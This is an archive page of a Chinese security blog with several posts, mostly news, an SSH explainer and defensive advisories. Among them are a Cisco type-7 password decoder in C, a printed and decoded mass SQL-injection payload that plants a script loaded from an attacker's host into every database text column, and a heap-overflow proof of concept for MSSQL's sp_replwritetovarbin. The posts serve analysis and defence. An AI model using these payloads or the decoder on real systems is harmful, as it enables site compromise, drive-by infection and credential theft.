分类 "网络安全" 的存档.

Cisco Password 7方式的密码破解程序

复制内容到剪贴板程序代码程序代码
/*
* * descambles cisco IOS type-7 passwords
* * found somewhere on the internet, slightly modified, anonymous@segfault.net
* *
* * gcc -Wall -o ciscocrack ciscocrack.c
* * ./ciscocrack 01178E05590909022A
* *
* */

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
0x55, 0x42
};

int
cdecrypt(char *enc_pw, char *dec_pw)
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] – '0') * 10 + enc_pw[1] – '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 – 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] – '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] – 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

void
usage()
{
fprintf(stdout, "Usage: ciscocrack \n");
}

int
main(int argc, char *argv[])
{
char passwd[65];

memset(passwd, 0, sizeof(passwd));

if(argc != 2)
{
usage();
exit(1);
}

if(cdecrypt(argv[1], passwd)) {
fprintf(stderr, "Error\n");
exit(1);
}
printf("Passwd: %s\n", passwd);

return 0;
}

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/446

2008年网络安全领域十大事件

近日,国外网站CRN评选出了2008年安全行业的十大事件,其中包括赛门铁克遭遇渠道信任危机、DNS缓存漏洞惊现和格鲁吉亚网络战等安全事件,以下为其全文:
一、赛门铁克遭遇渠道信任危机
杀毒软件开发商赛门铁克首席运营官(COO)恩里克.塞伦(Enrique Salem)今年6月表示,计划允许900名客户直接从赛门铁克手中购买产品。而在上月,赛门铁克则刚刚宣布,公司现任CEO汤普森将于2009年4月退休,届时其职位将由塞伦接任。对此一些渠道商表示,十分担忧今后同赛门铁克的合作关系。
二、DNS缓存中毒漏洞
今年出现了史上最强大的互联网漏洞–DNS缓存漏洞,此漏洞直指我们应用中互联网脆弱的安全系统,而安全性差的根源在于设计缺陷。利用该漏洞轻则可以让用户无法打开网页,重则是网络钓鱼和金融诈骗,给受害者造成巨大损失。
这种攻击往往被归类为域欺骗攻击(pharming attack),成百上千的用户会被植入缓存中毒攻击的服务器重定向,引导至黑客设立的圈套站点上。不同于其他漏洞,利用DNS漏洞发动攻击可以横跨所有平台,包括Mac和Linux。此外,这种漏洞还允许黑客攻击IPSec VPNs,SSL认证,软件自动更新系统和垃圾邮件过滤器以及VoIP系统。
三、McAfee收购Secure Computing
今年九月,McAfee暴出一则重磅消息:他们计划斥资4.65亿美元的现金收购网络安全公司Secure Computing。此举将使McAfee公司拥有从软件到硬件产品的一整套服务,以防止计算机网络黑客的攻击。
总部位于加利福尼亚州圣克拉拉的McAfee公司,已经是仅次于赛门铁克公司的全球第2大反病毒软件供应商,它一直致力于创建最佳的计算机安全解决方案,以防止网络入侵并保护计算机系统免受下一代混合攻击和威胁。
四、赛门铁克吞并MessageLabs
在10月份,赛门铁克公司已签署收购在线通讯和网络安全服务供应商MessageLabs公司的最终协议。根据协议,赛门铁克公司将以约6.95亿美元的现金价格收购MessageLabs。
MessageLabs是全球在线通讯安全领域排名首位的供应商,赛门铁克收购MessageLabs后,将有助于其在迅猛增长的“软件即服务”(SaaS)市场将取得领先优势,同时会进一步巩固其在通讯安全市场上的翘楚地位。通过将MessageLabs在SaaS市场上广泛的专业知识与赛门铁克丰富的技术组合相结合,赛门铁克将可提供更为全面的在线服务,实现对信息的安全保护和管理。
五、安全管理层人事变动
在2008年,广大安全管理人员都出现了巨大的人事变动。最值得注意的就是赛门铁克公司CEO John W. Thompson将在本财政年度结束时退休。董事会已任命现任首席运营官Enrique T. Salem接任总裁兼首席执行官一职,并于2009年4月4日起生效。
另外,McAfee的渠道主管Dave Dickison 也由北美渠道副总裁Lisa Loe接替。而趋势科技公司运营总裁Lane Bess则跳槽至Palo Alto Networks担任负责人,而Bess的职位则由趋势科技渠道副总裁Nancy Reynolds补充。
六、隐私被暴露的政治动机
如果当初阿拉斯加州州长莎拉帕林懂得更好的保护密码安全,那么隐私被暴露就可以避免。黑客只需要使用密码重置功能,通过维基百科找到所需问题的答案,就可以轻松实现。
关于帕林的新闻曾经一度登上了各大新闻媒体的头版头条,并引发人们要求谷歌和雅虎等公司根本上增强安全协议的呼声。
七、McColo被关闭
互联网安全联盟HostExploit曝光了目前最大的垃圾邮件组织团伙–McColo,并且随后由互联网服务提供商对其进行了关闭处理。此举使得全球互联网上的广告兜售邮件锐减50%,使得垃圾邮件减少了75%。
据悉,位于加州圣何塞的这家网络托管服务商McColo,依靠美其他公司的服务器,除了垃圾邮件之外,还散布其它恶意软件,并托管着大量的儿童色情网站。
八、微软的紧急额外补丁
在一年半的时间当中,这是微软首次发布紧急额外(out-of-band)补丁。在十月份,微软发布了一个关于恶意互联网蠕虫病毒的紧急额外补丁,该病毒主要存在于网络检索或者未安装补丁且受到感染的计算机上。如果没有安装补丁,黑客就可以利用攻击代码进行有针对性地攻击活动。
事实上,微软在其月度安全公告中,就迫不及待的推出了该补丁,被称为“补丁星期二”,这表明该问题是多么的严重。
九、Hannaford Bros.数据外泄
美国东海岸连锁超市(East Coast)的母公司Hannaford Bros.称,该超市的用户数据库系统遭到黑客入侵,造成400多万个银行卡帐户信息泄露,因此导致了1800起与银行卡有关的欺诈事件。在持卡人认证过程中,有420万个单个的信用卡和借记卡信息泄露,成为迄今为止涉及用户规模最大的数据入侵事件之一。
此次信息泄露事件波及美国东部地区的全部165个连锁店,佛罗里达州的106个连锁店,另外还有部分出售Hannaford产品的其它独立超市连锁店。
十、格鲁吉亚网络战
在俄罗斯向格鲁吉亚发动战争前格鲁吉亚社会基础网络便受到了俄罗斯黑客的攻击。接下来,几乎与战争同步,格鲁吉亚政府网站也遭到了黑客攻击。格总统萨卡什维利的个人主页被人篡改,宣称“萨卡什维利与希特勒有某些‘共同之处’”的照片被放在首页上。迫于无奈,8月10日,格鲁吉亚方面把总统的网站从格鲁吉亚境内的服务器迁到了美国的服务器上。俄罗斯方面则表示,来自格鲁吉亚的黑客攻击了俄方的新闻机构。
这也引发了人们关于这场战争是纯网络战争还是军事战争在网络上开辟的第二个战场的激烈辩论。无论如何,俄罗斯和格鲁吉亚双方利用互联网进行攻击的程度都达到了空前的水平。有专家就表示,这种网络战争的趋势有可能会持续下去。
 

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/447

安全外壳协议SSH详解

  一、SSH介绍
  SSH即安全外壳协议,英文全称是Secure Shell Protocol或Secure Shell。其运作原理跟Telnet类似,只是其具有更高的安全性。通过使用SSH,你可以把所有传输的数据进行加密,这样“中间人”这种攻击方式就不可能实现了,而且也能够防止DNS和IP欺骗。还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。SSH有很多功能,它既可以代替telnet,又可以为ftp、pop、甚至ppp提供一个安全的“通道”。
  最初SSH是由芬兰的一家公司开发的。但是因为受版权和加密算法的限制,现在很多人都转而使用OpenSSH(http://www.openssh.com/)。OpenSSH是SSH的替代软件,而且是免费的,可以预计将来会有越来越多的人使用它而不是SSH。为方便学习,本文以SSH为例进行相关知识介绍。
  二、SSH产生的背景
  传统的网络服务程序,如:Ftp、Pop和Telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且这些服务程序的安全验证方式也是有其弱点的,就是很容易受到“中间人”(man-in-the-middle)这种方式的攻击。所谓“中间人”的攻击方式,就是“中间人”冒充真正的服务器接收你的传给服务器的数据,然后再冒充你把数据传给真正的服务器。当前很多网络攻击者都会采用这种手段。为防止“中间人”攻击,SSH应运而生。
  三、SSH的安全验证是如何工作的
  从客户端来看,SSH提供两种级别的安全验证。
  第一种级别(基于口令的安全验证)只要你知道自己帐号和口令,就可以登录到远程主机。所有传输的数据都会被加密,但是不能保证你正在连接的服务器就是你想连接的服务器。可能会有别的服务器在冒充真正的服务器,也就是受到“中间人”这种方式的攻击。
  第二种级别(基于密匙的安全验证)需要依靠密匙,也就是你必须为自己创建一对密匙,并把公用密匙放在需要访问的服务器上。如果你要连接到SSH服务器上,客户端软件就会向服务器发出请求,请求用你的密匙进行安全验证。服务器收到请求之后,先在你在该服务器的家目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。如果两个密匙一致,服务器就用公用密匙加密“质询”(challenge)并把它发送给客户端软件。客户端软件收到“质询”之后就可以用你的私人密匙解密再把它发送给服务器。
  用这种方式,你必须知道自己密匙的口令。但是,与第一种级别相比,第二种级别不需要在网络上传送口令。
  第二种级别不仅加密所有传送的数据,而且“中间人”这种攻击方式也是不可能的(因为他没有你的私人密匙)。但是整个登录的过程可能需要10秒。
  四、SSH主要组成部分:
  传输层协议SSH-TRANS:提供了服务器认证,保密性及完整性。此外它有时还提供压缩功能。SSH-TRANS通常运行在TCP/IP连接上,也可能用于其它可靠数据流上。 SSH-TRANS提供了强力的加密技术、密码主机认证及完整性保护。该协议中的认证基于主机,并且该协议不执行用户认证。更高层的用户认证协议可以设计为在此协议之上。
  用户认证协议SSH-USERAUTH:用于向服务器提供客户端用户鉴别功能。它运行在传输层协议SSH-TRANS上面。当SSH-USERAUTH开始后,它从低层协议那里接收会话标识符(从第一次密钥交换中的交换哈希H)。会话标识符唯一标识此会话并且适用于标记以证明私钥的所有权。SSH-USERAUTH 也需要知道低层协议是否提供保密性保护。
  连接协议SSH-CONNECT:将多个加密隧道分成逻辑通道。它运行在用户认证协议上。它提供了交互式登录话路、远程命令执行、转发TCP/IP连接和转发X11连接。
  一旦建立一个安全传输层连接,客户机就发送一个服务请求。当用户认证完成之后,会发送第二个服务请求。这样就允许新定义的协议可以与上述协议共存。连接协议提供了用途广泛的各种通道,有标准的方法用于建立安全交互式会话外壳和转发(“隧道技术”)专有 TCP/IP 端口和 X11 连接。
  五、SSH的两大部分
  SSH软件包由服务器端与客户端两大部分构成。服务器端主要是安装在被控制端,即我们需要进行远程管理的对象。而客户端就是安装在操作方的主机上。SSH软件包适用于所有的操作系统,包括微软、Linux以及思科公司的IOS操作系统等等。
  六、配制实例
  由于SSH采用了加密机制,所以其配制起来比Telnet协议要复杂一点。下面就以Cisco的防火墙服务器为例,看看如何配置SSH协议,让其在服务器上生效。
  为了让防火墙启用SSH服务,则需要通过五个步骤。
  第一步:配置防火墙主机名。
  这个步骤虽然不是启用SSH服务的必备步骤。不过,笔者还是建议用户给防火墙起一个合适的名字。当通过客户端访问SSH服务期的时候,输入名字要比输入IP地址简单的多。而且,名字也比枯燥无味的数字好记的多。故起一个容易记忆的SSH服务器名字,是SSH服务器管理的基础。
  在Cisco防火墙中,可以利用hostname命令来配置SSH服务器的名字。为了便于识别,一般在取名的时候,需要符合一定的规则。如利用“设备名称――实体名字”规则来命名。
  第二步:生成密钥对。
  在Cisco防火墙中,其建议采用的是“密钥认证安装方式”。所以,需要为其生成密钥对。这个步骤也很简单,因为防火墙中已经有默认的事项方式。管理员只需要在命令行中,输入:ca generate rsa key 1024这个命令,防火墙操作系统就会自动生成一个密钥对。密钥对生成后,管理员还需要使用命令CA SAVE ALL命令,把这个密钥对保存起来。
  这里要注意,不同的系统采用的加密机制不同,所以,生成的密钥对方式也不同。作为企业安全管理人员来说,应该对密钥生成的方式有一个统一的规划。在安全允许的情况下,最后在公司内部统一安全密钥的生成方式。这可以大大的减少我们维护的工作量。
  第三步:指定客户端的IP地址。
  Cisco防火墙为了提高远程管理的安全性,特别进行了一个IP地址的过滤。在SSH服务器上,必须指定客户端的IP地址。只有允许的Ip地址,才可以通过SSH客户端连接到SSH服务器上。
  这是一个很重要的安全控制手段。通过这种方式,则只有特定的客户端才可以利用SSH协议远程管理防火墙。而未经授权的客户端无权进行访问。这让SSH远程管理安全性更有保障。
  管理员可以利用ssh ip_adress 命令,来配置允许访问的客户端IP地址。一般情况下,只允许管理员才可以通过SSH方式访问远程主机。
  第四步:设置访问口令。
  为了保障SSH的安全,虽然已经限制了客户端,但是仍然非常有必要为其设置一个访问帐户与口令。有时候,SSH服务器也会有默认的用户名。但是,为了SSH服务器的安全,笔者强烈建议用户在第一时间把这个默认密码改掉。在第一时间更改服务器与设备的默认帐户与密码,是

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/449

c.nuclear3.c%6F%6D/css/c.js挂马完美解决方案

最近挂马闹得异常的凶,用GOOGLE搜索下:/css/c.js>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵, 约有

498,000项,上万个网站被挂马。

木马地址不断变形,但总是http://c.nuclear3.com/这段在不断变化,变种有

<Script Src=http://c.nu%63lear3.com/css/c.js>Script

<Script Src=http://c.nuclear3%2E%63om/css/c.js>Script

<Script Src=http://%63.nuclear3.com/css/c.js>Script

等等。

最终经过安全伞终于抓到木马原型如下:

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt

(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000

4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620

06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063

007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F006

2006A006500630074007300200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200

6500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D002700750

02700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E005800740079

00700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002

E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F00430075007200

73006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C00650

05F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040

004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078006

50063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B002700

2B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007200740028005600610072006300680

0610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C005300630072

0069007000740020005300720063003D0068007400740070003A002F002F0063002E006E00750063006C0065006100720033002

E0063002500360046002500360044002F006300730073002F0063002E006A0073003E003C002F00530063007200690070007400

3E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0

065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C

006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007

400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);–

该木马通过Cookie注入挂马,使用搜索引擎自动查找并注入网站,有点蠕虫的性质。

上面cast里面sql语句解密如下

Declare @T Varchar(255),@C Varchar(255)

Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And

A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167)

Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0)

Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''

Src=http://c.nuclear3.c%6F%6D/css/c.js>''')Fetch Next From Table_Cursor Into @T,@C
End

Close Table_Cursor

Deallocate Table_Cursor

安全伞2009企业版可以有效解决类似变相注入问题

官方下载:http://121.207.254.246/safe3.rar

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/450

韩国不满日花滑选手胜利 引爆韩日黑客大战

      新闻来源:《环球时报》
      环球时报驻韩国特约记者沈松报道,因日本选手在花样滑冰比赛中战胜韩国选手,韩日两国黑客日前展开了网上大战。 据韩联社16日报道,在韩国高阳13日举行的花样滑冰大奖赛总决赛中,日本选手浅田真央战胜韩国选手金妍儿获得冠军,随后韩国部分网民集中攻击了日本网站。

      愤怒的日本网民随即将攻击来源指向韩国民间团体?网络外交使节团?(VANK),向VANK网站同时发动攻击。日本著名的网上论坛?2ch?甚至刊登了攻击VANK指南。

      受日本黑客的攻击,VANK网站14日被迫暂时关闭。VANK团长朴基泰表示,为保护网站,目前只允许韩国国内会员登录。

      网络外交使节团?(VANK)的宗旨是致力于让全世界教科书、地图、网站都能够正确地介绍韩国,该组织网站此前就曾遭到日本网民的攻击而陷入瘫痪。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/451

Microsoft SQL Server sp_replwritetovarbin远程堆溢出漏洞

ps:如果与注入结合起来用的话?大家赶紧像办法预防吧。

发布日期:2008-12-09
更新日期:2008-12-11

受影响系统:

Microsoft SQL Server 2005 SP2
Microsoft SQL Server 2005 SP1
Microsoft SQL Server 2000

描述:


BUGTRAQ ID:

32710

Microsoft SQL Server是一款流行的SQL数据库系统。

 

SQL Server的sp_replwritetovarbin扩展存储过程中存在堆溢出漏洞。如果远程攻击者在参数中提供了未初始化变量的话,就可以触发这个溢出,向可控的位置写入内存,导致以有漏洞SQL Server进程的权限执行任意代码。

 

在默认的配置中,任何用户都可以访问sp_replwritetovarbin过程。通过认证的用户可以通过直接的数据库连接或SQL注入来利用这个漏洞。

 

<*来源:Bernhard Mueller (

research@sec-consult.com

 

 

 

链接:

http://secunia.com/advisories/33034/

 

http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt

 

http://marc.info/?l=bugtraq&m=122893402319138&w=2

*>

测试方法:


 

  警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

DECLARE @buf NVARCHAR(4000),

 

@val NVARCHAR(4),

 

@counter INT

 

SET @buf = ‘

 

declare @retcode int,

 

@end_offset int,

 

@vb_buffer varbinary,

 

@vb_bufferlen int,

 

@buf nvarchar;

 

exec master.dbo.sp_replwritetovarbin 1,

 

@end_offset output,

 

@vb_buffer output,

 

@vb_bufferlen output,”’

 

SET @val = CHAR(0x41)

 

SET @counter = 0

 

WHILE @counter < 3000

 

BEGIN

 

SET @counter = @counter + 1

 

SET @buf = @buf + @val

 

END

 

SET @buf = @buf + ”’,”1”,”1”,”1”,

 

”1”,”1”,”1”,”1”,”1”,”1”’

 

EXEC master..sp_executesql @buf

建议:


厂商补丁:

 

Microsoft

 

———

 

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

 

from:http://www.nsfocus.net/vulndb/12728

 

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/452

Microsoft 安全通报:4 种方法暂时屏蔽 IE 最新 0day

IE 最新 0day 波及了微软全线系统,目前暂时没有补丁。微软于近日发布了一份安全通报,指导您如何暂时屏蔽此漏洞。
漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此,微软连出了4个杀手锏:

1. SACL 法(仅适用于 Vista)
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[File Security]
"%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"

将以上内容保存为 BlockAccess_x86.inf
然后在命令提示符里执行 SecEdit /configure /db BlockAccess.sdb /cfg
其中 为 inf 文件路径。若成功会看到?任务成功结束?的提示。

2. 禁用 Row Position 功能法

HKEY_CLASSES_ROOT\CLSID\{2048EEE6-7FA2-11D0-9E6A-00A0C9138C29}
打开注册表编辑器,将此键删除即可。

3. 取消 DLL 注册法

在命令提示符中输入 Regsvr32.exe /u "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll"
即可

4. 权限设置法

在命令提示符中输入 cacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /E /P everyone:N

Vista 系统则需要输入3个命令:

takeown /f "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll"
icacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /save %TEMP%\oledb32.32.dll.TXT
icacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /deny everyone:(F)

其中第一种方法影响最小(只影响 IE 对此 DLL 的访问)。

附:此漏洞影响的系统、软件列表

Windows Internet Explorer 7
Windows Internet Explorer 7 for Windows XP
Windows Internet Explorer 7 for Windows Server 2003
Windows Internet Explorer 7 for Windows Server 2003 IA64
Windows Internet Explorer 7 in Windows Vista
Windows Internet Explorer 8 Beta
Microsoft Internet Explorer 6.0 Service Pack 2
Microsoft Internet Explorer 6.0 Service Pack 1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.01 Service Pack 4
Windows Server 2008 Datacenter without Hyper-V
Windows Server 2008 Enterprise without Hyper-V
Windows Server 2008 for Itanium-Based Systems
Windows Server 2008 Standard without Hyper-V
Windows Server 2008 Datacenter
Windows Server 2008 Enterprise
Windows Server 2008 Standard
Windows Web Server 2008
Windows Vista Service Pack 1, when used with:
Windows Vista Business
Windows Vista Enterprise
Windows Vista Home Basic
Windows Vista Home Premium
Windows Vista Starter
Windows Vista Ultimate
Windows Vista Enterprise 64-bit Edition
Windows Vista Home Basic 64-bit Edition
Windows Vista Home Premium 64-bit Edition
Windows Vista Ultimate 64-bit Edition
Windows Vista Business 64-bit Edition
Microsoft Windows Server 2003 Service Pack 1, when used with:
Microsoft Windows Server 2003, Standard Edition (32-bit x86)
Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
Microsoft Windows Server 2003, Web Edition
Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems
Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems
Microsoft Windows Server 2003, Datacenter x64 Edition
Microsoft Windows Server 2003, Enterprise x64 Edition
Microsoft Windows Server 2003, Standard x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Service Pack 2, when used with:
Microsoft Windows Server 2003, Standard Edition (32-bit x86)
Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
Microsoft Windows Server 2003, Web Edition
Microsoft Windows Server 2003, Datacenter x64 Edition
Microsoft Windows Server 2003, Enterprise x64 Edition
Microsoft Windows Server 2003, Standard x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems
Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems
Microsoft Windows XP Service Pack 2, when used with:
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Microsoft Windows XP Service Pack 3, when used with:
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
对于非 x86 系统请参考微软安全通报自行操作。

概括自微软安全通报

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/453